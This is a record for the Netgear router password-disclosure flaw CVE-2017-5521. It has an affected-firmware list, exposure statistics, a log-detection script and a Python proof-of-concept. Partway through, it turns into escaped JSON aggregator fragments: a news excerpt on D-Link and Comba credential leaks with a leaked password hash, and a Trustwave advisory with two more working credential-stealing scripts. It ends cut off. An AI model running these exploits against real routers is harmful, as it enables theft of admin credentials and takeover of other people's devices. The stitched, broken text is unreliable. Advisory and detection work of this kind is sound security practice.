Netgear router password disclosure vulnerability (CVE-2017-5521)
ID: SSV:92639 | Type: seebug | Reporter: (not given) | Modified: 2017-02-03
Description
0x01 Vulnerability overview
NETGEAR is a well-known US router manufacturer whose products are used extensively worldwide. Recently, security researcher Simon Kenin found a password disclosure vulnerability, CVE-2017-5521, affecting several NETGEAR router series. The vulnerability can be triggered when the router's Password Recovery feature is disabled and remote management is enabled.
0x02 Vulnerability impact
Affected routers are at risk of leaking their administrator password.
0x03 Affected versions
Versions that the vulnerability's publisher has currently verified as affected:
AC1450 V1.0.0.34_10.0.16 (Latest)
AC1450 V1.0.0.22_1.0.10
AC1450 V1.0.0.14_1.0.6
D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
D6400 V1.0.0.34_1.3.34
D6400 V1.0.0.38_1.1.38
D6400 V1.0.0.22_1.0.22
DC112A V1.0.0.30_1.0.60 (Latest)
DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
JNDR3000 V1.0.0.18_1.0.16 (Latest)
R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
R6300 V1.0.2.78_1.0.58 (Latest)
R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
R6300v2 V1.0.3.30_10.0.73
R6700 V1.0.1.14_10.0.29 (Latest beta)
R6700 V1.0.0.26_10.0.26 (Latest stable)
R6700 V1.0.0.24_10.0.18
R6900 V1.0.0.4_1.0.10 (Latest)
R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
R8300 V1.0.2.48_1.0.52
R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
R8500 V1.0.2.26_1.0.41
R8500 V1.0.0.56_1.0.28
R8500 V1.0.0.20_1.0.11
VEGN2610 V1.0.0.35_1.0.35 (Latest)
VEGN2610 V1.0.0.29_1.0.29
VEGN2610 V1.0.0.27_1.0.27
WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
WNDR4000 V1.0.2.4_9.1.86 (Latest)
WNDR4500 V1.0.1.40_1.0.68 (Latest)
WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
WNDR4500v2 V1.0.0.42_1.0.25
WGR614v10 V1.0.2.60_60.0.85 NA (Latest)
WGR614v10 V1.0.2.58_60.0.84 NA
WGR614v10 V1.0.2.54_60.0.82 NA
WN3100RP V1.0.0.14_1.0.19 (Latest)
WN3100RP V1.0.0.6_1.0.12
Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
Lenovo R3220 V1.0.0.13_1.0.13
0x04 Vulnerability verification
A vulnerable router can be verified by requesting the following URL on it: ip:port/passwordrecovered.cgi?
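As an added example (not part of the original Seebug record and not the PoC that follows), here is the log-side check a defender of such a router would want: it scans web-management access-log lines for requests to passwordrecovered.cgi, the endpoint this section names, and rates each one by whether the request came from outside the LAN and whether the router answered 200. The Common Log Format, the sample lines and the helper names (detect_password_recovery_probes, is_lan_address, remote_sources) are my assumptions, not NETGEAR's.

```python
import ipaddress
import re
from collections import namedtuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in Common Log Format (assumed format; a
# NETGEAR device's real log format differs). 203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges standing in for Internet addresses, 192.168.1.0/24
# stands in for the LAN. The malformed last line exercises the skip path.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Feb/2017:10:01:12 +0000] "GET / HTTP/1.1" 401 0
203.0.113.7 - - [03/Feb/2017:10:01:13 +0000] "POST /passwordrecovered.cgi?id=get_rekt HTTP/1.1" 200 1834
192.168.1.20 - - [03/Feb/2017:10:05:40 +0000] "GET /passwordrecovered.cgi?id=123456 HTTP/1.1" 200 1834
192.168.1.20 - - [03/Feb/2017:10:06:02 +0000] "GET /index.htm HTTP/1.1" 200 512
198.51.100.9 - - [03/Feb/2017:10:09:55 +0000] "GET /passwordrecovered.cgi HTTP/1.1" 401 0
this line is not a valid log record
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)

# RFC 1918 ranges only. The documentation ranges used above are deliberately
# not treated as LAN, so a request from them counts as remote.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

Alert = namedtuple("Alert", "src ts method token status severity")


def is_lan_address(ip):
    """True if ip falls inside an RFC 1918 private range; False for garbage input."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in LAN_NETS)


def detect_password_recovery_probes(log_text):
    """Return one Alert per request to passwordrecovered.cgi.

    severity: high   = remote source and HTTP 200 (credential page most likely served)
              medium = LAN source and HTTP 200 (legitimate recovery, or local abuse)
              low    = any other status (request was refused)
    """
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        parts = urlsplit(m["target"])
        if parts.path.lower() != "/passwordrecovered.cgi":
            continue
        # the id= value is the recovery token the endpoint expects; keep it for triage
        token = parse_qs(parts.query).get("id", [None])[0]
        status = int(m["status"])
        src = m["src"]
        if status == 200 and not is_lan_address(src):
            severity = "high"
        elif status == 200:
            severity = "medium"
        else:
            severity = "low"
        alerts.append(Alert(src, m["ts"], m["method"], token, status, severity))
    return alerts


def remote_sources(alerts):
    """Distinct non-LAN addresses that touched the endpoint, sorted for a block list."""
    return sorted({a.src for a in alerts if not is_lan_address(a.src)})


if __name__ == "__main__":
    found = detect_password_recovery_probes(SAMPLE_LOG)
    for a in found:
        print("%-6s %s %s %s id=%s -> %d" % (a.severity, a.ts, a.src, a.method, a.token, a.status))
    print("remote sources:", remote_sources(found))
```

A "high" alert on a router whose remote management is enabled and password recovery disabled is the condition the overview describes, and the remediation is the vendor's: apply the patched firmware where one exists, otherwise disable remote management and enable password recovery.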
0x05 Vulnerability distribution
On 2017-02-03 we searched the ZoomEye cyberspace search engine for Netgear and got 2,249,273 results; of these, 5,065 routers were found to still be affected, located in 81 countries. The distribution of the top ten countries by count is shown below:
In terms of port distribution, 32 different open port numbers were seen on these routers; the top ten port numbers are shown below:
We then classified the passwords of these routers and counted 3,156 distinct passwords. The following table gives the number of occurrences of the ten most common passwords:
The most frequent password in the table is "password", which is the NETGEAR router default; that is, 744 of the affected routers use the default password, of which 267 are in the United States and 173 in Kuwait.
#!/usr/bin/env python
# coding: utf-8
import sys
import requests

def scrape(text, start_trig, end_trig):
    # Return the text between the first start_trig and the next end_trig,
    # or a sentinel string when start_trig is absent
    if text.find(start_trig) != -1:
        return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
    else:
        return "i_dont_speak_english"

#disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()

#1st stage: fetch the root page; the WWW-Authenticate realm names the router model
ip = sys.argv[1]
port = sys.argv[2]
url = 'http://' + ip + ':' + port + '/'
try:
    r = requests.get(url)
except requests.exceptions.RequestException:
    url = 'https://' + ip + ':' + port + '/'
    r = requests.get(url, verify=False)
model = r.headers.get('WWW-Authenticate')
if model is not None:
    print("Attacking: " + model[13:-1])
else:
    print("not a netgear router")
    sys.exit(0)

#2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt'
try:
    r = requests.post(url, verify=False)
except requests.exceptions.RequestException:
    print("not vulnerable router")
    sys.exit(0)

#profit
if r.text.find('left\">') != -1:
    username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
    username = scrape(username, '>', '\'')
    password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
    password = scrape(password, '>', '\'')
    if username == "i_dont_speak_english":
        # page without the English labels: fall back to the first/last left-aligned cells
        username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
        password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
else:
    print("not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again")
    sys.exit(0)

#html encoding pops out of nowhere, lets replace that
password = password.replace("&#35;", "#")
password = password.replace("&amp;", "&")
print("user: " + username)
print("pass: " + password)
\n \n\n\n> \"The following username & password are used by the user to connect to his ISP, leaking this info could allow an attacker to use those credentials for himself and abuse the ISP,\" the advisory for the flaw explains.\n\n \n\n\n> \"On top of that, bad security habits of password reuse could possibly allow an attacker to gain control of the router itself.\"\n\n \n\n\n \nResearchers notified D-Link of the vulnerabilities in early January, but the company released Firmware patches on September 6, just three days prior to the full disclosure of the issues. \n \n\n\n## Comba Wi-Fi Access Controller Vulnerabilities\n\n \nOut of three, the first vulnerability impacts the Comba AC2400 WiFi Access Controller, leaking the MD5 hash of the device password just by accessing the following URL without requiring any authentication. \n \n\n\n> https://[router ip address]/09/business/upgrade/upcfgAction.php?download=true\n\n \n\"The username is admin, with system privileges and the md5 of his password is 61d217fd8a8869f6d26887d298ce9a69 (trustwave). MD5 is very easy to break, if SSH/Telnet is enabled, this could lead to a full takeover of the filesystem of the device,\" the advisory reads. \n \n\n\n[](<https://1.bp.blogspot.com/-bnLepqqvOHY/XXfM23xe2PI/AAAAAAAA1A8/0fnNFS9viCIjCmJUWg-PNXiz71tjndyDQCLcBGAs/s728-e100/router-hacking-1.jpg>)\n\n \nThe other two vulnerabilities impact the Comba AP2600-I WiFi Access Point (version A02,0202N00PD2). \n \nOne of these flaws also leaks MD5 hash of the device username and password through the source code of the web-based management login page, while the other one leaks credentials in plaintext stored in an SQLite database file located at https://[router ip address]/goform/downloadConfigFile. \n \nResearchers attempted to contact Comba Telecom multiple times since February this year, but never succeeded in receiving a response. 
\n \nAll the three vulnerabilities discovered in Comba Telecom routers are unpatched at the time of writing, and it remains unknown whether the company has any plan to address them or not.\n", "modified": "2019-09-10T16:42:31", "published": "2019-09-10T16:41:00", "id": "THN:4EBD42C3757E080E11C736252B193432", "href": "https://thehackernews.com/2019/09/router-password-hacking.html", "type": "thn", "title": "Some D-Link and Comba WiFi Routers Leak Their Passwords in Plaintext", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2017-01-31T19:04:16", "description": "", "published": "2017-01-31T00:00:00", "type": "packetstorm", "title": "Netgear Router Password Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-01-31T00:00:00", "id": "PACKETSTORM:140844", "href": "https://packetstormsecurity.com/files/140844/Netgear-Router-Password-Disclosure.html", "sourceData": "`Trustwave SpiderLabs Security Advisory TWSL2017-003: \nMultiple Vulnerabilities in NETGEAR Routers \n \nPublished: 01/30/2017 \nVersion: 1.0 \n \nVendor: NETGEAR (http://www.netgear.com/) \nProduct: Multiple products \n \nFinding 1: Remote and Local Password Disclosure \nCredit: Simon Kenin of Trustwave SpiderLabs \nCVE: CVE-2017-5521 \n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest) \n# AC1450 V1.0.0.22_1.0.10 \n# AC1450 V1.0.0.14_1.0.6 \n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected) \n# D6400 V1.0.0.34_1.3.34 \n# D6400 V1.0.0.38_1.1.38 \n# D6400 V1.0.0.22_1.0.22 \n# DC112A V1.0.0.30_1.0.60 (Latest) \n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected) \n# JNDR3000 V1.0.0.18_1.0.16 (Latest) \n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected) \n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected) \n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected) \n# R6300 V1.0.2.78_1.0.58 (Latest) \n# R6300v2 
V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched) \n# R6300v2 V1.0.3.30_10.0.73 \n# R6700 V1.0.1.14_10.0.29 (Latest beta) \n# R6700 V1.0.0.26_10.0.26 (Latest stable) \n# R6700 V1.0.0.24_10.0.18 \n# R6900 V1.0.0.4_1.0.10 (Latest) \n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched) \n# R8300 V1.0.2.48_1.0.52 \n# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched) \n# R8500 V1.0.2.26_1.0.41 \n# R8500 V1.0.0.56_1.0.28 \n# R8500 V1.0.0.20_1.0.11 \n# VEGN2610 V1.0.0.35_1.0.35 (Latest) \n# VEGN2610 V1.0.0.29_1.0.29 \n# VEGN2610 V1.0.0.27_1.0.27 \n# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected) \n# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected) \n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest) \n# WNDR4000 V1.0.2.4_9.1.86 (Latest) \n# WNDR4500 V1.0.1.40_1.0.68 (Latest) \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest) \n# WNDR4500v2 V1.0.0.42_1.0.25 \n# WGR614v10 V1.0.2.60_60.0.85NA (Latest) \n# WGR614v10 V1.0.2.58_60.0.84NA \n# WGR614v10 V1.0.2.54_60.0.82NA \n# WN3100RP V1.0.0.14_1.0.19 (Latest) \n# WN3100RP V1.0.0.6_1.0.12 \n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest) \n# Lenovo R3220 V1.0.0.13_1.0.13 \n \n \nProduct description: \nMultiple Netgear Routers \n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequests to the web management server. The bug is exploitable remotely if the \nremote management option is set and can also be exploited given access to the \nrouter over LAN or WLAN. \n \nWhen trying to access the web panel a user is asked to authenticate, if the \nauthentication is cancelled and password recovery is not enabled, the user is \nredirected to a page which exposes a password recovery token. If a user \nsupplies the correct token to the page \nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \nenabled), they will receive the admin password for the router. 
\n \nIf password recovery is set, the exploit will fail: the router will ask the user for the recovery \nquestions that were set when the feature was enabled. This is \npersistent; even after the recovery option is disabled, the exploit will still fail \nbecause the router will ask for the security questions. \nThis can easily be reproduced using the attached PoC, or by sending these two \nsimple requests via the browser: \n1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token \n2. http://router/passwordrecovered.cgi?id=TOKEN will give you the credentials (some models require a POST request instead of GET) \n \n## netgore.py \nimport sys \nimport html \nimport requests \n \n \ndef scrape(text, start_trig, end_trig): \n    # return the text between the first start_trig and the following end_trig \n    if text.find(start_trig) != -1: \n        return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] \n    else: \n        return \"i_dont_speak_english\" \n \n \n# disable the InsecureRequestWarning raised by verify=False \nrequests.packages.urllib3.disable_warnings() \n# 1st stage - get token \nip = sys.argv[1] \nport = sys.argv[2] \nurl = 'http://' + ip + ':' + port + '/' \ntry: \n    r = requests.get(url) \nexcept requests.exceptions.RequestException: \n    url = 'https://' + ip + ':' + port + '/' \n    r = requests.get(url, verify=False) \n# the Basic-auth realm names the router model \nmodel = r.headers.get('WWW-Authenticate') \nif model is not None: \n    print(\"Attacking: \" + model[13:-1]) \nelse: \n    print(\"not a netgear router\") \n    sys.exit(0) \n# the unauth.cgi redirect carries the recovery token \ntoken = scrape(r.text, 'unauth.cgi?id=', '\\\"') \nif token == 'i_dont_speak_english': \n    print(\"not vulnerable\") \n    sys.exit(0) \nprint(\"token found: \" + token) \n# 2nd stage - pass the token - get the password \nurl = url + 'passwordrecovered.cgi?id=' + token \nr = requests.post(url, verify=False) \n# profit \nif r.text.find('left\\\">') != -1: \n    username = repr(scrape(r.text, 'Router Admin Username</td>', '</td>')) \n    username = scrape(username, '>', '\\'') \n    password = repr(scrape(r.text, 'Router Admin Password</td>', '</td>')) \n    password = scrape(password, '>', '\\'') \n    if username == \"i_dont_speak_english\": \n        # older page layout: the values sit in the first and last left-aligned cells \n        username = scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>') \n        password = scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>') \nelse: \n    print(\"not vulnerable because password recovery IS set\") \n    sys.exit(0) \n# the page HTML-encodes some characters (e.g. # and &); decode them \npassword = html.unescape(password) \nprint(\"user: \" + username) \nprint(\"pass: \" + password) \n \n================================ \nJust run the PoC against a router to get the credentials if it is vulnerable. \n \n \n \nFinding 2: Remote and Local Password Disclosure \nCredit: Simon Kenin of Trustwave SpiderLabs \nCVE: CVE-2017-5521 \n \nVersion affected: \n \n# AC1450 V1.0.0.34_10.0.16 (Latest) \n# AC1450 V1.0.0.22_1.0.10 \n# AC1450 V1.0.0.14_1.0.6 \n# D6300 V1.0.0.96_1.1.96 (Latest) \n# D6300B V1.0.0.36_1.0.36 \n# D6300B V1.0.0.32_1.0.32 \n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched) \n# D6400 V1.0.0.22_1.0.22 \n# DC112A V1.0.0.30_1.0.60 (Latest) \n# DGN2200v4 V1.0.0.76_1.0.76 (Latest) \n# DGN2200v4 V1.0.0.66_1.0.66 \n# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest) \n# JNDR3000 V1.0.0.18_1.0.16 (Latest) \n# R6200 V1.0.1.56_1.0.43 (Latest) \n# R6200 V1.0.1.52_1.0.41 \n# R6200 V1.0.1.48_1.0.37 \n# R6200v2 V1.0.3.10_10.1.10 (Latest) \n# R6200v2 V1.0.1.20_1.0.18 \n# R6250 V1.0.4.6_10.1.12 (Latest beta) \n# R6250 V1.0.4.2_10.1.10 (Latest stable) \n# R6250 V1.0.1.84_1.0.78 \n# R6300 V1.0.2.78_1.0.58 (Latest) \n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched) \n# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.) 
\n# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched) \n# R6700 V1.0.0.26_10.0.26 (Latest) \n# R6700 V1.0.0.24_10.0.18 \n# R6900 V1.0.0.4_1.0.10 (Latest) \n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched) \n# R7000 V1.0.4.30_1.1.67 \n# R7900 V1.0.1.8_10.0.14 (Latest beta) \n# R7900 V1.0.1.4_10.0.12 (Latest stable) \n# R7900 V1.0.0.10_10.0.7 \n# R7900 V1.0.0.8_10.0.5 \n# R7900 V1.0.0.6_10.0.4 \n# R8000 V1.0.3.26_1.1.18 (Latest beta) \n# R8000 V1.0.3.4_1.1.2 (Latest stable) \n# R8300 V1.0.2.48_1.0.52 \n# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched) \n# R8500 V1.0.2.30_1.0.43 \n# VEGN2610 V1.0.0.35_1.0.35 (Latest) \n# VEGN2610 V1.0.0.27_1.0.27 \n# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest) \n# VEVG2660 V1.0.0.23_1.0.23 \n# WNDR3400v2 V1.0.0.52_1.0.81 (Latest) \n# WNDR3400v3 V1.0.1.4_1.0.52 (Latest) \n# WNDR3400v3 V1.0.1.2_1.0.51 \n# WNDR3400v3 V1.0.0.22_1.0.29 \n# WNDR3700v3 V1.0.0.38_1.0.31 (Latest) \n# WNDR4000 V1.0.2.4_9.1.86 (Latest) \n# WNDR4500 V1.0.1.40_1.0.68 (Latest) \n# WNDR4500 V1.0.1.6_1.0.24 \n# WNDR4500v2 V1.0.0.60_1.0.38 (Latest) \n# WNDR4500v2 V1.0.0.50_1.0.30 \n# WNR1000v3 V1.0.2.68_60.0.93NA (Latest) \n# WNR1000v3 V1.0.2.62_60.0.87 (Latest) \n# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest) \n# WNR3500Lv2 V1.2.0.32_40.0.74 \n# WGR614v10 V1.0.2.60_60.0.85NA (Latest) \n# WGR614v10 V1.0.2.58_60.0.84NA \n# WGR614v10 V1.0.2.54_60.0.82NA \n \n# Lenovo R3220 V1.0.0.16_1.0.16 (Latest) \n# Lenovo R3220 V1.0.0.13_1.0.13 \n \n \nMany Netgear routers are prone to password disclosure via simple crafted \nrequest to the web management server. The bug is exploitable remotely if the \nremote management option is set and can also be exploited given access to the \nrouter over LAN or WLAN. \n \nNetgear routers have an option to restore forgotten password via 2 security \nquestions. 
If the recovery option is disabled (which is the default), it is \nstill possible to recover the password by sending a correct token to the \nrecovery page. \n \nIf a user supplies the correct token to the page \nhttp://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not \nenabled), they will receive the admin password for the router. If password \nrecovery is set, the exploit will fail: the router will ask the user for the recovery \nquestions that were set when the feature was enabled. This is \npersistent; even after the recovery option is disabled, the exploit will still fail \nbecause the router will ask for the security questions. \n \nThis mechanism does not work correctly on the very first request to \n\"passwordrecovered.cgi\": the token is not properly checked, which means that \nany TOKEN value will result in disclosure of the password. \nThe issue recurs after every reboot of the router. \n \nThis can easily be reproduced using the attached PoC, or by sending a simple \nrequest via the browser: \n1. 
http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you the credentials (some models require a POST request instead of GET) \n \n## netgore2.py \nimport sys \nimport html \nimport requests \n \n \ndef scrape(text, start_trig, end_trig): \n    # return the text between the first start_trig and the following end_trig \n    if text.find(start_trig) != -1: \n        return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] \n    else: \n        return \"i_dont_speak_english\" \n \n \n# disable the InsecureRequestWarning raised by verify=False \nrequests.packages.urllib3.disable_warnings() \n# 1st stage - identify the router from the Basic-auth realm \nip = sys.argv[1] \nport = sys.argv[2] \nurl = 'http://' + ip + ':' + port + '/' \ntry: \n    r = requests.get(url) \nexcept requests.exceptions.RequestException: \n    url = 'https://' + ip + ':' + port + '/' \n    r = requests.get(url, verify=False) \nmodel = r.headers.get('WWW-Authenticate') \nif model is not None: \n    print(\"Attacking: \" + model[13:-1]) \nelse: \n    print(\"not a netgear router\") \n    sys.exit(0) \n# 2nd stage - on the first request after a reboot the token is not checked, \n# so an arbitrary id value is sent \nurl = url + 'passwordrecovered.cgi?id=get_rekt' \ntry: \n    r = requests.post(url, verify=False) \nexcept requests.exceptions.RequestException: \n    print(\"not vulnerable router\") \n    sys.exit(0) \n# profit \nif r.text.find('left\\\">') != -1: \n    username = repr(scrape(r.text, 'Router Admin Username</td>', '</td>')) \n    username = scrape(username, '>', '\\'') \n    password = repr(scrape(r.text, 'Router Admin Password</td>', '</td>')) \n    password = scrape(password, '>', '\\'') \n    if username == \"i_dont_speak_english\": \n        # older page layout: the values sit in the first and last left-aligned cells \n        username = scrape(r.text[r.text.find('left\\\">'):-1], 'left\\\">', '</td>') \n        password = scrape(r.text[r.text.rfind('left\\\">'):-1], 'left\\\">', '</td>') \nelse: \n    print(\"not vulnerable router, or someone else already accessed passwordrecovered.cgi, reboot router and test again\") \n    sys.exit(0) \n# the page HTML-encodes some characters (e.g. # and &); decode them \npassword = html.unescape(password) \nprint(\"user: \" + username) \nprint(\"pass: \" + password) \n \n================================ \nJust run the PoC against a router to get the credentials if it is vulnerable. 
\n \n \n \n \nRemediation Steps: \nPlease see NETGEAR's KBA for list of firmware patches for various models. As a \nworkaround, the bug only works when password recovery is NOT set. If you do set \npassword recovery this is not exploitable. \n \nRevision History: \n04/06/2016 - Vulnerability disclosed to vendor \n04/19/2016 - Request for update and received confirmation of receipt of the advisories \n05/18/2016 - Request for update; no response \n07/14/2016 - Request for update \n07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage \n10/17/2016 - Request for update \n12/15/2016 - Notice of intent to publish advisories \n01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd \n01/30/2017 - Advisory published \n \n \nReferences \n1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html \n2. https://www.exploit-db.com/exploits/32883/ \n3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability \n \n \nAbout Trustwave: \nTrustwave is the leading provider of on-demand and subscription-based \ninformation security and payment card industry compliance management \nsolutions to businesses and government entities throughout the world. For \norganizations faced with today's challenging data security and compliance \nenvironment, Trustwave provides a unique approach with comprehensive \nsolutions that include its flagship TrustKeeper compliance management \nsoftware and other proprietary security solutions. Trustwave has helped \nthousands of organizations--ranging from Fortune 500 businesses and large \nfinancial institutions to small and medium-sized retailers--manage \ncompliance and secure their network infrastructure, data communications and \ncritical information assets. Trustwave is headquartered in Chicago with \noffices throughout North America, South America, Europe, Africa, China and \nAustralia. 
For more information, visit https://www.trustwave.com \n \nAbout Trustwave SpiderLabs: \nSpiderLabs(R) is the advanced security team at Trustwave focused on \napplication security, incident response, penetration testing, physical \nsecurity and security research. The team has performed over a thousand \nincident investigations, thousands of penetration tests and hundreds of \napplication security tests globally. In addition, the SpiderLabs Research \nteam provides intelligence through bleeding-edge research and proof of \nconcept tool development to enhance Trustwave's products and services. \nhttps://www.trustwave.com/spiderlabs \n \nDisclaimer: \nThe information provided in this advisory is provided \"as is\" without \nwarranty of any kind. Trustwave disclaims all warranties, either express or \nimplied, including the warranties of merchantability and fitness for a \nparticular purpose. In no event shall Trustwave or its suppliers be liable \nfor any damages whatsoever including direct, indirect, incidental, \nconsequential, loss of business profits or special damages, even if \nTrustwave or its suppliers have been advised of the possibility of such \ndamages. Some states do not allow the exclusion or limitation of liability \nfor consequential or incidental damages so the foregoing limitation may not \napply. 
\n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140844/TWSL2017-003.txt"}], "zdt": [{"lastseen": "2018-04-13T01:51:16", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2017-01-30T00:00:00", "type": "zdt", "title": "Netgear Routers - Password Disclosure Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5521"], "modified": "2017-01-30T00:00:00", "href": "https://0day.today/exploit/description/26837", "id": "1337DAY-ID-26837", "sourceData": "Trustwave SpiderLabs Security Advisory TWSL2017-003:\r\nMultiple Vulnerabilities in NETGEAR Routers\r\n \r\nPublished: 01/30/2017\r\nVersion: 1.0\r\n \r\nVendor: NETGEAR (http://www.netgear.com/)\r\nProduct: Multiple products\r\n \r\nFinding 1: Remote and Local Password Disclosure\r\nCredit: Simon Kenin of Trustwave SpiderLabs\r\nCVE: CVE-2017-5521\r\n \r\nVersion affected: \r\n \r\n# AC1450 V1.0.0.34_10.0.16 (Latest)\r\n# AC1450 V1.0.0.22_1.0.10\r\n# AC1450 V1.0.0.14_1.0.6\r\n# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)\r\n# D6400 V1.0.0.34_1.3.34\r\n# D6400 V1.0.0.38_1.1.38\r\n# D6400 V1.0.0.22_1.0.22\r\n# DC112A V1.0.0.30_1.0.60 (Latest)\r\n# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)\r\n# JNDR3000 V1.0.0.18_1.0.16 (Latest)\r\n# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)\r\n# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)\r\n# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)\r\n# R6300 V1.0.2.78_1.0.58 (Latest)\r\n# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)\r\n# R6300v2 V1.0.3.30_10.0.73\r\n# R6700 V1.0.1.14_10.0.29 (Latest beta)\r\n# R6700 V1.0.0.26_10.0.26 (Latest stable)\r\n# R6700 V1.0.0.24_10.0.18\r\n# R6900 V1.0.0.4_1.0.10 (Latest)\r\n# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is 
